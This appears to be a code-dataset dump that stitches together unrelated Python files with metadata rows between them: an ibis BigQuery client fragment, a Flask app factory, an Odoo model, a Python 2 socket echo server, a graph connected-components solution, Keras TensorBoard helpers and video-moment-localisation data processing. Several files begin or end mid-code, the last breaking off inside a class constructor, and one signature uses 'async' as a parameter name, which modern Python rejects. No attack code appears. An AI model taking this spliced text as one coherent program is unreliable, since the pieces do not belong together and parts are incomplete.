def bq_param_boolean(param, value):
    return bq.ScalarQueryParameter(param.get_name(), 'BOOL', value)


@bigquery_param.register(ir.DateScalar, six.string_types)
def bq_param_date_string(param, value):
    # Parse the string with pandas, then delegate to the datetime.date case.
    return bigquery_param(param, pd.Timestamp(value).to_pydatetime().date())


@bigquery_param.register(ir.DateScalar, datetime.datetime)
def bq_param_date_datetime(param, value):
    # Truncate to the date portion and delegate to the datetime.date case.
    return bigquery_param(param, value.date())


@bigquery_param.register(ir.DateScalar, datetime.date)
def bq_param_date(param, value):
    return bq.ScalarQueryParameter(param.get_name(), 'DATE', value)
class BigQueryClient(SQLClient):
    """ibis client for Google BigQuery, scoped to one project and dataset."""

    sync_query = BigQueryQuery
    database_class = BigQueryDatabase
    proxy_class = BigQueryAPIProxy
    dialect = comp.BigQueryDialect

    def __init__(self, project_id, dataset_id):
        self._proxy = type(self).proxy_class(project_id)
        self._dataset_id = dataset_id

    @property
    def project_id(self):
        return self._proxy.project_id

    @property
    def dataset_id(self):
        return self._dataset_id

    @property
    def _table_expr_klass(self):
        return ir.TableExpr

    def table(self, *args, **kwargs):
        """Return a table expression; for partitioned tables the native
        _PARTITIONTIME pseudo-column is renamed to the configured
        ``ibis.options.bigquery.partition_col`` name.
        """
        t = super(BigQueryClient, self).table(*args, **kwargs)
        if NATIVE_PARTITION_COL in t.columns:
            col = ibis.options.bigquery.partition_col
            assert col not in t
            return (t
                    .mutate(**{col: t[NATIVE_PARTITION_COL]})
                    .drop([NATIVE_PARTITION_COL]))
        return t

    def _build_ast(self, expr, context):
        result = comp.build_ast(expr, context)
        return result

    # NOTE(review): ``async`` became a reserved keyword in Python 3.7, so
    # this signature is a SyntaxError on modern interpreters; the parameter
    # should be renamed (e.g. ``async_``) together with its callers.
    def _execute_query(self, dml, async=False):
        klass = self.async_query if async else self.sync_query
        inst = klass(self, dml, query_parameters=dml.context.params)
        df = inst.execute()
        return df

    def _fully_qualified_name(self, name, database):
        # 'dataset.table', defaulting to the client's dataset.
        dataset_id = database or self.dataset_id
        return dataset_id + '.' + name

    def _get_table_schema(self, qualified_name):
        return self.get_schema(qualified_name)

    def _execute(self, stmt, results=True, query_parameters=None):
        """Run ``stmt`` synchronously and return a BigQueryCursor."""
        # TODO(phillipc): Allow **kwargs in calls to execute
        query = self._proxy.client.run_sync_query(stmt)
        query.use_legacy_sql = False
        query.query_parameters = query_parameters or []
        query.run()

        # run_sync_query is not really synchronous: there's a timeout
        while not query.job.done():
            query.job.reload()
            time.sleep(0.1)

        return BigQueryCursor(query)

    def database(self, name=None):
        if name is None:
            name = self.dataset_id
        return self.database_class(name, self)

    @property
    def current_database(self):
        return self.database(self.dataset_id)

    def set_database(self, name):
        self._dataset_id = name

    def exists_database(self, name):
        return self._proxy.get_dataset(name).exists()

    def list_databases(self, like=None):
        """List dataset names, optionally filtered by regex ``like``."""
        results = [dataset.name
                   for dataset in self._proxy.get_datasets()]
        if like:
            results = [
                dataset_name for dataset_name in results
                if re.match(like, dataset_name)
            ]
        return results

    def exists_table(self, name, database=None):
        (table_id, dataset_id) = _ensure_split(name, database)
        return self._proxy.get_table(table_id, dataset_id).exists()

    def list_tables(self, like=None, database=None):
        """List table names in a dataset, optionally regex-filtered."""
        dataset = self._proxy.get_dataset(database or self.dataset_id)
        result = [table.name for table in dataset.list_tables()]
        if like:
            result = [
                table_name for table_name in result
                if re.match(like, table_name)
            ]
        return result

    def get_schema(self, name, database=None):
        """Infer an ibis schema for the named table."""
        (table_id, dataset_id) = _ensure_split(name, database)
        bq_table = self._proxy.get_table(table_id, dataset_id)
        return sch.infer(bq_table)

    @property
    def version(self):
        # Version of the installed google-cloud-bigquery package.
        return parse_version(bq.__version__)
# NOTE(review): the two mappings below duplicate and rebind the
# _DTYPE_TO_IBIS_TYPE / _LEGACY_TO_STANDARD names already defined near the
# top of this module with identical contents; candidates for removal.
_DTYPE_TO_IBIS_TYPE = {
    'INT64': dt.int64,
    'FLOAT64': dt.double,
    'BOOL': dt.boolean,
    'STRING': dt.string,
    'DATE': dt.date,
    # FIXME: enforce no tz info
    'DATETIME': dt.timestamp,
    'TIME': dt.time,
    'TIMESTAMP': dt.timestamp,
    'BYTES': dt.binary,
}

_LEGACY_TO_STANDARD = {
    'INTEGER': 'INT64',
    'FLOAT': 'FLOAT64',
    'BOOLEAN': 'BOOL',
}
def _discover_type(field):
    """Convert a BigQuery SchemaField to an ibis dtype.

    NOTE(review): near-duplicate of bigquery_field_to_ibis_dtype defined
    earlier in this module; kept for the legacy schema helper below.
    """
    typ = field.field_type
    if typ == 'RECORD':
        # Nested RECORD fields become a Struct, converted recursively.
        fields = field.fields
        assert fields
        names = [el.name for el in fields]
        ibis_types = [_discover_type(el) for el in fields]
        ibis_type = dt.Struct(names, ibis_types)
    else:
        # Normalize legacy type names, then map to an ibis dtype.
        ibis_type = _LEGACY_TO_STANDARD.get(typ, typ)
        ibis_type = _DTYPE_TO_IBIS_TYPE.get(ibis_type, ibis_type)
    if field.mode == 'REPEATED':
        ibis_type = dt.Array(ibis_type)
    return ibis_type
def bigquery_table_to_ibis_schema(table):
    """Build an ibis schema from a BigQuery table object.

    NOTE(review): near-duplicate of the sch.infer-registered
    bigquery_schema function earlier in this module.
    """
    pairs = [(el.name, _discover_type(el)) for el in table.schema]
    try:
        # Partitioned tables expose the _PARTITIONTIME pseudo-column.
        if table.list_partitions():
            pairs.append((NATIVE_PARTITION_COL, dt.timestamp))
    except BadRequest:
        # Table does not support partition listing; treat as unpartitioned.
        pass
    return ibis.schema(pairs)
| 28.020134 | 79 | 0.660918 | 1,599 | 12,525 | 4.954972 | 0.161351 | 0.032942 | 0.019437 | 0.022214 | 0.379149 | 0.297615 | 0.261896 | 0.241954 | 0.20207 | 0.20207 | 0 | 0.003755 | 0.234571 | 12,525 | 446 | 80 | 28.08296 | 0.822677 | 0.032176 | 0 | 0.291536 | 0 | 0 | 0.034124 | 0 | 0 | 0 | 0 | 0.004484 | 0.018809 | 0 | null | null | 0.015674 | 0.059561 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
295f637700f993cfd8e37b0ff39f106d2c2a6469 | 1,716 | py | Python | {{cookiecutter.project_slug}}/api/__init__.py | Steamboat/cookiecutter-devops | 6f07329c9e54b76e671a0308d343d2d9ebff5343 | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/api/__init__.py | Steamboat/cookiecutter-devops | 6f07329c9e54b76e671a0308d343d2d9ebff5343 | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/api/__init__.py | Steamboat/cookiecutter-devops | 6f07329c9e54b76e671a0308d343d2d9ebff5343 | [
"BSD-3-Clause"
] | null | null | null |
import logging
from flask import Flask
from flask_sqlalchemy import SQLAlchemy as _BaseSQLAlchemy
from flask_migrate import Migrate
from flask_cors import CORS
from flask_talisman import Talisman
from flask_ipban import IpBan
from config import Config, get_logger_handler
# database
class SQLAlchemy(_BaseSQLAlchemy):
def apply_pool_defaults(self, app, options):
super(SQLAlchemy, self).apply_pool_defaults(app, options)
options["pool_pre_ping"] = True
db = SQLAlchemy()
migrate = Migrate()
cors = CORS()
talisman = Talisman()
global_config = Config()
ip_ban = IpBan(ban_seconds=200, ban_count=global_config.IP_BAN_LIST_COUNT)
# logging
logger = logging.getLogger('frontend')
def create_app(config_class=None):
app = Flask(__name__)
if config_class is None:
config_class = Config()
app.config.from_object(config_class)
db.init_app(app)
migrate.init_app(app, db)
# TODO - Refine and update when build pipeline is stable. Get from global_config
cors.init_app(app, origins=["http://localhost:5000", "http://localhost:3000", '*'])
if app.config["ENV"] in ("staging", "production"):
# Secure the application and implement best practice https redirects and a content security policy
talisman.init_app(app, content_security_policy=None)
# ip_ban.init_app(app)
# ip_ban.load_nuisances(global_config.IP_BAN_REGEX_FILE)
from api.routes import bp as api_bp
app.register_blueprint(api_bp)
if not app.debug and not app.testing:
app.logger.addHandler(get_logger_handler())
@app.teardown_appcontext
def shutdown_session(exception=None):
db.session.remove()
return app
from api import models
| 32.377358 | 106 | 0.740093 | 238 | 1,716 | 5.105042 | 0.39916 | 0.044444 | 0.041152 | 0.027984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007741 | 0.171911 | 1,716 | 52 | 107 | 33 | 0.847291 | 0.156177 | 0 | 0 | 0 | 0 | 0.058333 | 0 | 0 | 0 | 0 | 0.019231 | 0 | 1 | 0.078947 | false | 0 | 0.263158 | 0 | 0.394737 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2967592aac9355f4e077c19d82c1790326f4a71b | 343 | py | Python | src/view/services_update_page.py | nbilbo/services_manager | 74e0471a1101305303a96d39963cc98fc0645a64 | [
"MIT"
] | null | null | null | src/view/services_update_page.py | nbilbo/services_manager | 74e0471a1101305303a96d39963cc98fc0645a64 | [
"MIT"
] | null | null | null | src/view/services_update_page.py | nbilbo/services_manager | 74e0471a1101305303a96d39963cc98fc0645a64 | [
"MIT"
] | null | null | null | from src.view.services_page import ServicesPage
from src.view.services_add_page import ServicesAddPage
class ServicesUpdatePage(ServicesAddPage):
    """Page for editing an existing service.

    Reuses the whole "add service" form; only the window title and the
    confirm-button label are changed.
    """

    def __init__(self, parent, *args, **kwargs):
        super().__init__(parent, *args, **kwargs)
        self.set_title("Update service")
        self.set_confirm_button_text("Update")
2967c010afb3c90f1b88a872839f1b992255abcc | 272 | py | Python | playground/sockets/server.py | tunki/lang-training | 79b9f59a7187053f540f9057c585747762ca8890 | [
"MIT"
] | null | null | null | playground/sockets/server.py | tunki/lang-training | 79b9f59a7187053f540f9057c585747762ca8890 | [
"MIT"
] | 4 | 2020-03-10T19:20:21.000Z | 2021-06-07T15:39:48.000Z | proglangs-learning/python/example_sockets/server.py | helq/old_code | a432faf1b340cb379190a2f2b11b997b02d1cd8d | [
"CC0-1.0"
] | null | null | null | import socket
# Minimal blocking TCP echo server (Python 2 — print statements).
# Listens on localhost:9999 and serves exactly one client connection.
s = socket.socket()
s.bind(("localhost", 9999))
s.listen(1)
# Block until a single client connects.
sc, addr = s.accept()
while True:
    # Receive up to 1024 bytes; the literal payload "quit" ends the session.
    recibido = sc.recv(1024)
    if recibido == "quit":
        break
    print "Recibido:", recibido
    # Echo the payload back to the client.
    sc.send(recibido)
print "adios"
sc.close()
s.close()
296855e3082fc927d6f123b69b223d9a6934f75b | 1,861 | py | Python | Graphs/ConnectedComponents.py | PK-100/Competitive_Programming | d0863feaaa99462b2999e85dcf115f7a6c08bb8d | [
"MIT"
] | 70 | 2018-06-25T21:20:15.000Z | 2022-03-24T03:55:17.000Z | Graphs/ConnectedComponents.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 4 | 2018-09-04T13:12:20.000Z | 2021-06-20T08:29:12.000Z | Graphs/ConnectedComponents.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 24 | 2018-12-26T05:15:32.000Z | 2022-01-23T23:04:54.000Z | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'countGroups' function below.
#
# The function is expected to return an INTEGER.
# The function accepts STRING_ARRAY related as parameter.
#
class Graph:
    """Undirected graph over vertices 0..V-1 stored as adjacency lists."""

    def __init__(self, V):
        self.V = V
        # One (initially empty) neighbour list per vertex.
        self.adj = [[] for _ in range(V)]

    def addEdge(self, a, b):
        """Insert the undirected edge a <-> b."""
        self.adj[a].append(b)
        self.adj[b].append(a)

    def dfs_util(self, temp, node, visited):
        """Recursive preorder DFS: append every unvisited vertex reachable
        from ``node`` onto ``temp`` and return it."""
        visited[node] = True
        temp.append(node)
        for neighbour in self.adj[node]:
            if not visited[neighbour]:
                temp = self.dfs_util(temp, neighbour, visited)
        return temp

    def countGroups(self):
        """
        This is the classical concept of connected components in a Graph
        """
        visited = [False] * self.V
        components = []
        for start in range(self.V):
            if not visited[start]:
                components.append(self.dfs_util([], start, visited))
        return components
def convertMatrixToGraph(mat):
    """Build a Graph from a character adjacency matrix.

    ``mat`` is a square matrix whose entry mat[i][j] equals the character
    '1' when an edge i <-> j exists. Only the upper triangle is read, so
    each undirected edge is inserted exactly once.
    """
    size = len(mat)
    graph = Graph(size)
    for row in range(size):
        # Start past the diagonal: equivalent to the j > i filter.
        for col in range(row + 1, size):
            if mat[row][col] == '1':
                graph.addEdge(row, col)
    return graph
def countGroups(related):
    """Count groups of directly or transitively related items.

    ``related`` is a list of '0'/'1' strings forming an adjacency matrix;
    the answer is the number of connected components of that graph.
    """
    return len(convertMatrixToGraph(related).countGroups())
if __name__ == '__main__':
    # HackerRank-style harness: read the row count, then each matrix row as
    # a string of '0'/'1' characters; write the group count to the file
    # named by the OUTPUT_PATH environment variable.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    related_count = int(input().strip())

    related = []

    for _ in range(related_count):
        related_item = input()
        related.append(related_item)

    result = countGroups(related)

    fptr.write(str(result) + '\n')

    fptr.close()
| 22.695122 | 96 | 0.576034 | 242 | 1,861 | 4.338843 | 0.371901 | 0.033333 | 0.017143 | 0.020952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00156 | 0.311123 | 1,861 | 81 | 97 | 22.975309 | 0.817473 | 0.189146 | 0 | 0 | 0 | 0 | 0.015732 | 0 | 0 | 0 | 0 | 0.012346 | 0 | 1 | 0.122449 | false | 0 | 0.102041 | 0 | 0.326531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
29699db1cd4c1b7712dc1f31ae88eb868493c3ed | 1,597 | py | Python | recognition/ml_model.py | hurschler/pig-face-recognition | 5834f3c89448a645ee0eaf2bbdade064f0c4be93 | [
"Apache-2.0"
] | 1 | 2021-11-19T05:33:39.000Z | 2021-11-19T05:33:39.000Z | recognition/ml_model.py | hurschler/pig-face-recognition | 5834f3c89448a645ee0eaf2bbdade064f0c4be93 | [
"Apache-2.0"
] | null | null | null | recognition/ml_model.py | hurschler/pig-face-recognition | 5834f3c89448a645ee0eaf2bbdade064f0c4be93 | [
"Apache-2.0"
] | 1 | 2022-01-05T12:57:12.000Z | 2022-01-05T12:57:12.000Z | import logging.config
import util.logger_init
import numpy as np
import tensorflow as tf
from sklearn.metrics import confusion_matrix
from util.tensorboard_util import plot_confusion_matrix, plot_to_image
from tensorflow.python.keras.callbacks_v1 import TensorBoard
from keras import backend as K
class MlModel:
    """Base class bundling shared Keras-model utilities: summary printing,
    a learning-rate schedule, and confusion-matrix logging to TensorBoard.

    Subclasses are expected to provide ``self.model`` (a Keras model),
    ``self.ml_data`` (with x_test / y_test / pig_dict) and
    ``self.file_writer_cm`` (a TF summary writer) — TODO confirm.
    """

    def get_model(self):
        # The wrapped Keras model instance.
        return self.model

    def summary_print(self):
        self.model.summary()

    # Define your scheduling function
    def scheduler(self, epoch):
        # Exponential decay: lr = 0.001 * 0.95 ** epoch.
        return 0.001 * 0.95 ** epoch

    def log_confusion_matrix(self, epoch, logs):
        """Keras callback hook: predict on the test split and write the
        resulting confusion matrix to TensorBoard as an image summary."""
        # Use the model to predict the values from the test_images.
        test_pred_raw = self.model.predict(self.ml_data.x_test)
        # Class index = arg-max over the per-class scores.
        test_pred = np.argmax(test_pred_raw, axis=1)
        # Calculate the confusion matrix using sklearn.metrics
        cm = confusion_matrix(self.ml_data.y_test, test_pred)
        figure = plot_confusion_matrix(cm, class_names=self.ml_data.pig_dict.values())
        cm_image = plot_to_image(figure)
        # Log the confusion matrix as an image summary.
        with self.file_writer_cm.as_default():
            tf.summary.image("Confusion Matrix", cm_image, step=epoch)
# TensorBoard callback subclass that also records the learning rate.
class LRTensorBoard(TensorBoard):
    """Logs everything TensorBoard does, plus the optimizer's current
    learning rate under the key ``lr`` at the end of every epoch."""

    def __init__(self, log_dir, **kwargs):
        # Forward any extra TensorBoard keyword arguments unchanged.
        super().__init__(log_dir=log_dir, **kwargs)

    def on_epoch_end(self, epoch, logs=None):
        logs = logs or {}
        # Evaluate the backend tensor holding the optimizer's lr.
        logs['lr'] = K.eval(self.model.optimizer.lr)
        super().on_epoch_end(epoch, logs)
| 31.313725 | 89 | 0.708203 | 229 | 1,597 | 4.69869 | 0.41048 | 0.111524 | 0.027881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007098 | 0.206011 | 1,597 | 50 | 90 | 31.94 | 0.841483 | 0.170319 | 0 | 0 | 0 | 0 | 0.013678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.266667 | 0.066667 | 0.6 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
2970d09ae49d5ea0ddb5185266b5f2bed4f79bf9 | 300 | py | Python | hanibal/ans_escuela/tipo_colaborador.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | hanibal/ans_escuela/tipo_colaborador.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | hanibal/ans_escuela/tipo_colaborador.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
from openerp.osv import fields, osv
from openerp import models, fields, api, _
class Tipo_Colaborador(models.Model):
    """Odoo/OpenERP model: a collaborator type ("tipo de colaborador")."""
    _name = 'tipo.colaborador'
    # Records display using their 'name' field.
    _rec_name = 'name'

    # Type name (label "Nombre").
    name=fields.Char(string='Nombre')
    # Active flag (label "Activo"); new records default to active.
    active=fields.Boolean(string='Activo',default=True)
2973ac2848fca5ea3493059da1e9b46b9746f3f2 | 17,005 | py | Python | utils/data_processing.py | LisaAnne/LocalizingMoments | b6a555c8134581305d0ed4716fbc192860e0b88c | [
"BSD-2-Clause"
] | 157 | 2017-08-04T21:56:46.000Z | 2022-03-05T13:49:02.000Z | utils/data_processing.py | Naman-Bhalla/LocalizingMoments | 618bebfe6c4b897e94770b8011d34aa45c941e62 | [
"BSD-2-Clause"
] | 19 | 2017-09-26T15:27:47.000Z | 2022-02-27T23:21:00.000Z | utils/data_processing.py | Naman-Bhalla/LocalizingMoments | 618bebfe6c4b897e94770b8011d34aa45c941e62 | [
"BSD-2-Clause"
] | 48 | 2017-08-08T11:18:39.000Z | 2021-11-15T04:20:33.000Z | import numpy as np
import sys
import os
sys.path.append('utils/')
from config import *
from utils import *
sys.path.append(pycaffe_dir)
import time
import pdb
import random
import pickle as pkl
import caffe
from multiprocessing import Pool
from threading import Thread
import random
import h5py
import itertools
import math
import re
# Dimensionality of the GloVe word vectors and path to the embedding file.
glove_dim = 300
glove_path = 'data/glove.6B.%dd.txt' %glove_dim
#glove_path = 'data/glove_debug_path.txt' #for debugging

# Safety stop (Python 2 print / pdb) if the debug embedding path was left on.
if glove_path == 'data/glove_debug_path.txt':
    print "continue?"
    pdb.set_trace()

# All contiguous [start, end] segments over six video chunks: the six
# singletons plus every pair (i, j) with i < j.
possible_segments = [(0,0), (1,1), (2,2), (3,3), (4,4), (5,5)]
for i in itertools.combinations(range(6), 2):
    possible_segments.append(i)

# Maximum sequence lengths for word/character preprocessing.
length_prep_word = 40
length_prep_character = 250

vocab_file = 'data/vocab_glove_complete.txt'
def word_tokenize(s):
    """Lower-case ``s``, replace every run of non-alphanumeric,
    non-whitespace characters with a space, and return the word list."""
    cleaned = re.sub('[^A-Za-z0-9\s]+', ' ', s.lower())
    return cleaned.split()
def sentences_to_words(sentences):
    """Tokenize each sentence in order and return one flat word list."""
    # str(...) mirrors the original defensive cast for non-str inputs.
    return [word
            for s in sentences
            for word in word_tokenize(str(s.lower()))]
class glove_embedding(object):
    ''' Creates glove embedding object

    Parses a GloVe text file (one "word v1 v2 ... vD" line per word) into:
      glove_array: (glove_dim, vocab_size) matrix, one column per word
      glove_dict:  word -> column index into glove_array
      glove_words: words in file order
    '''

    def __init__(self, glove_file=glove_path):
        glove_txt = open(glove_file).readlines()
        glove_txt = [g.strip() for g in glove_txt]
        # Each line: the word followed by its vector components.
        glove_vector = [g.split(' ') for g in glove_txt]
        glove_words = [g[0] for g in glove_vector]
        glove_vecs = [g[1:] for g in glove_vector]
        glove_array = np.zeros((glove_dim, len(glove_words)))
        glove_dict = {}
        for i, w in enumerate(glove_words): glove_dict[w] = i
        # Fill one column per word; string components are coerced to float.
        for i, vec in enumerate(glove_vecs):
            glove_array[:,i] = np.array(vec)
        self.glove_array = glove_array
        self.glove_dict = glove_dict
        self.glove_words = glove_words
class zero_language_vector(object):
    """Null language model: every description maps to one shared all-zero
    embedding (useful as an ablation baseline)."""

    def __init__(self, data):
        self.dim = glove_dim

    def get_vector_dim(self):
        return self.dim

    def get_vocab_size(self):
        return 0

    def preprocess(self, data):
        """Attach the zero embedding to every item in-place and normalise
        each item's ground truth to a (start, end) tuple."""
        # Deliberately a single shared array, as in the original.
        zero_vec = np.zeros((self.get_vector_dim(),))
        for item in data:
            item['language_input'] = zero_vec
            item['gt'] = (item['gt'][0], item['gt'][1])
        return data
class recurrent_language(object):
    """Base class for word-by-word sentence encoders.

    Subclasses provide ``self.vocab_dict`` (word -> per-word vector/value)
    and ``get_vector_dim()`` (the size of each per-word entry).
    """

    def get_vocab_size(self):
        return len(self.vocab_dict.keys())

    def preprocess_sentence(self, words):
        """Encode ``words`` into a (num_encoded_words, vector_dim) matrix.

        Out-of-vocabulary words fall back to the '<unk>' entry when the
        vocabulary has one, and are silently dropped otherwise (the matrix
        is trimmed to the rows actually filled).
        """
        vector_dim = self.get_vector_dim()
        sentence_mat = np.zeros((len(words), vector_dim))
        count_words = 0
        for i, w in enumerate(words):
            try:
                sentence_mat[count_words,:] = self.vocab_dict[w]
                count_words += 1
            except:
                if '<unk>' in self.vocab_dict.keys():
                    sentence_mat[count_words,:] = self.vocab_dict['<unk>']
                    count_words += 1
                else:
                    pass
        # Drop rows reserved for words that were skipped.
        sentence_mat = sentence_mat[:count_words]
        return sentence_mat

    def preprocess(self, data):
        """Encode each item's 'description' into 'language_input' in-place."""
        for d in data:
            words = sentences_to_words([d['description']])
            # BUG FIX: previously called self.preprocess(words), recursing
            # with a word list (and crashing on d['description']) instead of
            # encoding the sentence.
            d['language_input'] = self.preprocess_sentence(words)
        return data
class recurrent_word(recurrent_language):
    """Word-index language model: each word encodes as its integer
    vocabulary index, so the per-word vector dimension is 1."""

    def __init__(self, data):
        self.data = data
        # Load the newline-separated vocabulary file and build word -> index.
        vocab = open(vocab_file).readlines()
        vocab = [v.strip() for v in vocab]
        # Guarantee an out-of-vocabulary fallback token.
        if '<unk>' not in vocab:
            vocab.append('<unk>')
        vocab_dict = {}
        for i, word in enumerate(vocab):
            vocab_dict[word] = i
        self.vocab_dict = vocab_dict

    def get_vector_dim(self):
        # One scalar (the index) per word.
        return 1
class recurrent_embedding(recurrent_language):
    """GloVe language model: each in-vocabulary word maps to its glove_dim
    embedding column; words without a GloVe vector are left out of
    vocab_dict (there is no '<unk>' vector)."""

    def read_embedding(self):
        print "Reading glove embedding"
        embedding = glove_embedding(glove_path)
        self.embedding = embedding

    def get_vector_dim(self):
        return glove_dim

    def __init__(self, data):
        self.read_embedding()
        embedding = self.embedding
        vector_dim = self.get_vector_dim()
        self.data = data
        self.data = data  # NOTE(review): duplicated assignment in original.
        vocab = open(vocab_file).readlines()
        vocab = [v.strip() for v in vocab]
        if '<unk>' in vocab:
            vocab.remove('<unk>') #don't have an <unk> vector.  Alternatively, could map to random vector...
        vocab_dict = {}
        for i, word in enumerate(vocab):
            try:
                # Column of the GloVe matrix for this word.
                vocab_dict[word] = embedding.glove_array[:,embedding.glove_dict[word]]
            except:
                print "%s not in glove embedding" %word
        self.vocab_dict = vocab_dict

    def preprocess(self, data):
        # Unlike the base class, this stores the raw word list; the actual
        # vector lookup happens later in the feature extractor.
        vector_dim = self.get_vector_dim()
        for d in data:
            d['language_input'] = sentences_to_words([d['description']])
        return data

    def get_vocab_dict(self):
        return self.vocab_dict
#Methods for extracting visual features
def feature_process_base(start, end, features):
    """Mean-pool the feature rows of the inclusive segment [start, end]."""
    segment = features[start:end + 1, :]
    return segment.mean(axis=0)
def feature_process_norm(start, end, features):
    """Mean-pool the segment [start, end] and L2-normalise the result.

    A small epsilon keeps the division safe for an all-zero segment.
    """
    pooled = np.mean(features[start:end + 1, :], axis=0)
    return pooled / (np.linalg.norm(pooled) + 0.00001)
def feature_process_context(start, end, features):
    """Concatenate a global (whole-video) feature with the local segment.

    First half: normalised pool over chunks 0-6 when the 6th chunk is
    non-empty, otherwise 0-5. Second half: normalised pool of [start, end].
    """
    feature_dim = features.shape[1]
    full_feature = np.zeros((feature_dim * 2,))
    # Include the trailing chunk in the global pool only when non-empty.
    global_end = 6 if np.sum(features[5, :]) > 0 else 5
    full_feature[:feature_dim] = feature_process_norm(0, global_end, features)
    full_feature[feature_dim:feature_dim * 2] = feature_process_norm(start, end, features)
    return full_feature
# Dispatch table: config string -> visual-feature pooling function.
# (Note: re-declared identically near the bottom of this file.)
feature_process_dict = {'feature_process_base': feature_process_base,
                        'feature_process_norm': feature_process_norm,
                        'feature_process_context': feature_process_context,
                       }
class extractData(object):
    """ General class to extract data.

    Subclasses set ``self.data_list`` (identifiers), ``self.num_data``,
    ``self.batch_size`` and ``self.iteration``; ``increment`` then yields
    successive batches of identifiers, reshuffling at each epoch boundary.
    """

    def increment(self):
        # uses iteration, batch_size, data_list, and num_data to extract next batch identifiers
        next_batch = [None] * self.batch_size
        if self.iteration + self.batch_size >= self.num_data:
            # Epoch boundary: take the tail of the current ordering, then
            # reshuffle and take the remainder from the new ordering's head.
            remaining = self.num_data - self.iteration
            next_batch[:remaining] = self.data_list[self.iteration:]
            random.shuffle(self.data_list)
            next_batch[remaining:] = self.data_list[:self.batch_size - remaining]
            # BUG FIX: resume at the number of items already consumed from
            # the reshuffled list. The original set
            # ``self.iteration = self.num_data - self.iteration``, which
            # skipped or repeated samples after most epoch wraps.
            self.iteration = self.batch_size - remaining
        else:
            next_batch = self.data_list[self.iteration:self.iteration + self.batch_size]
            self.iteration += self.batch_size
        assert self.iteration > -1
        assert len(next_batch) == self.batch_size
        return next_batch
class extractLanguageFeatures(extractData):
    """Produces per-batch sentence tensors: a (T, batch, glove_dim) query
    matrix plus a (T, batch) continuation-indicator matrix."""

    def __init__(self, dataset, params, result=None):
        self.data_list = range(len(dataset))
        self.num_data = len(self.data_list)
        self.dataset = dataset
        self.iteration = 0
        self.vocab_dict = params['vocab_dict']
        self.batch_size = params['batch_size']
        # Vector dimension inferred from any vocab entry (Python 2 .values()).
        self.num_glove_centroids = self.vocab_dict.values()[0].shape[0]
        # Maximum sentence length in words.
        self.T = params['sentence_length']
        if isinstance(result, dict):
            # Training mode: register output keys/shapes for the data layer.
            self.result = result
            self.query_key = params['query_key']
            self.cont_key = params['cont_key']
            self.top_keys = [self.query_key, self.cont_key]
            self.top_shapes = [(self.T, self.batch_size, self.num_glove_centroids),
                               (self.T, self.batch_size)]
        else:
            print "Will only be able to run in test mode"

    def get_features(self, query):
        """Encode one word list into right-aligned (T, dim) features and a
        (T,) continuation mask (1 for every word after the first)."""
        feature = np.zeros((self.T, self.num_glove_centroids))
        cont = np.zeros((self.T,))
        # Truncate queries longer than T words.
        len_query = min(len(query), self.T)
        if len_query < len(query):
            query = query[:len_query]
        for count_word, word in enumerate(query):
            try:
                feature[-(len_query)+count_word,:] = self.vocab_dict[word]
            except:
                # Unknown word: zero vector.
                feature[-(len_query)+count_word,:] = np.zeros((glove_dim,))
        # NOTE(review): for len_query == 1 this slice is cont[-0:] == the
        # whole array, marking every step — confirm that is intended.
        cont[-(len_query-1):] = 1
        assert np.sum(feature[:-len_query,:]) == 0
        return feature, cont

    def get_data_test(self, data):
        query = data['language_input']
        return self.get_features(query)

    def get_data(self, next_batch):
        """Fill the shared result dict with this batch's query/cont tensors."""
        data = self.dataset
        query_mat = np.zeros((self.T, self.batch_size, self.num_glove_centroids))
        cont = np.zeros((self.T, self.batch_size))
        for i, nb in enumerate(next_batch):
            query = data[nb]['language_input']
            query_mat[:,i,:], cont[:,i] = self.get_features(query)
        self.result[self.query_key] = query_mat
        self.result[self.cont_key] = cont
class extractVisualFeatures(extractData):
    """Produces per-batch visual features for moment localisation training:
    a positive segment feature, its time stamp, a negative time stamp, and
    (depending on loss_type) intra-/inter-video negative features."""

    def __init__(self, dataset, params, result):
        self.data_list = range(len(dataset))
        self.feature_process_algo = params['feature_process']
        self.loc_feature = params['loc_feature']
        self.num_data = len(self.data_list)
